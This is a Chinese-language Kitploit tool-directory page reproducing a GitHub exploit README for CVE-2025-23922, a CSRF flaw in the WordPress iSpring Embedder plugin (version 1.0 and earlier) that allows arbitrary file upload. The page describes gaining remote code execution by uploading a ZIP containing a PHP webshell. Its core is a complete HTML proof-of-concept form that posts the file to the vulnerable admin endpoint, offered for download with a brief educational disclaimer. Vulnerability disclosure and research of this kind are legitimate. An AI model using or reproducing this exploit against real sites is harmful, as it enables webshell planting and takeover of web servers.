Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2025-23922
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnxploited/cve-2025-23922

CVE-2025-23922

WordPress iSpring Embedder 插件 <= 1.0 - CSRF 到任意文件上传漏洞

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-23922 - WordPress iSpring Embedder 插件的 CSRF 导致任意文件上传

📌 CVE 详情

  • CVE ID: CVE-2025-23922
  • 发布时间: 2025-01-16
  • 受影响插件: WordPress iSpring Embedder 插件
  • 受影响版本: <= 1.0
  • 插件作者: Harsh
  • 漏洞类型: 跨站请求伪造 (CSRF) → 任意文件上传
  • CWE ID: CWE-352: 跨站请求伪造 (CSRF)
  • CVSS 评分: 10.0(严重)
  • 攻击向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🔥 描述

iSpring Embedder WordPress 插件中存在一个 CSRF 漏洞,允许未经身份验证的远程攻击者诱骗已通过身份验证的管理员向服务器上传任意文件(例如 PHP 网页木马)。

存在漏洞的端点未实施任何 CSRF 保护,并且文件上传功能接受 .zip 文件,这些文件会被解压到以下位置:

root@kitploit:~
/wp-content/uploads/iSpring_embedder/

💡 影响

攻击者可以:

  • 无需身份验证即可触发文件上传。
  • 通过上传包含恶意 PHP 文件的 ZIP 压缩包来获取远程代码执行 (RCE) 权限。
  • 通过结合精心构造的网页木马,攻陷整个 Web 服务器。

🚀 概念验证 (PoC) 利用代码(HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF 文件上传利用</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      padding: 20px;
    }
    .container {
      background: #fff;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 600px;
      margin: auto;
    }
    h1 {
      color: #d9534f;
    }
    input[type="file"],
    input[type="submit"] {
      margin-top: 10px;
      padding: 10px;
      font-size: 16px;
    }
    .footer {
      margin-top: 30px;
      font-size: 14px;
      color: #777;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>CSRF 利用 – 文件上传</h1>

    <p>
      这是以下漏洞的概念验证 (PoC) 利用代码:
    </p>
    <ul>
      <li><strong>漏洞类型:</strong>CSRF 导致任意文件上传</li>
      <li><strong>插件:</strong>iSpring Embedder for WordPress(<= v1.0)</li>
      <li><strong>CVE:</strong>CVE-2025-23922</li>
      <li><strong>影响:</strong>远程攻击者可迫使已通过身份验证的管理员上传任意文件,可能包括网页木马。</li>
      <li><strong>上传路径:</strong><code>/wp-content/uploads/iSpring_embedder/</code></li>
    </ul>

    <form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
      <label><strong>选择要上传的 ZIP 文件:</strong></label><br>
      <input type="file" name="zip_file" required><br>
      <input type="hidden" name="file_name" value="exploit_csrf">
      <input type="submit" name="submit_ispring_form" value="通过 CSRF 上传文件">
    </form>

    <div class="footer">
      <p>
        针对 <strong>CSRF 导致任意文件上传漏洞</strong> 的利用代码<br>
        <strong>CVE-2025-23922</strong><br>
        开发者:<strong>Nxploit | Khaled Alenazi</strong>
      </p>
    </div>
  </div>
</body>
</html>



⚠️ 免责声明

此概念验证仅供教育和研究目的使用。
作者对因使用此利用代码而导致的任何滥用或损害概不负责。

Nxploit | Khaled Alenazi
安全研究员与漏洞利用开发者
https://github.com/Nxploit

下载工具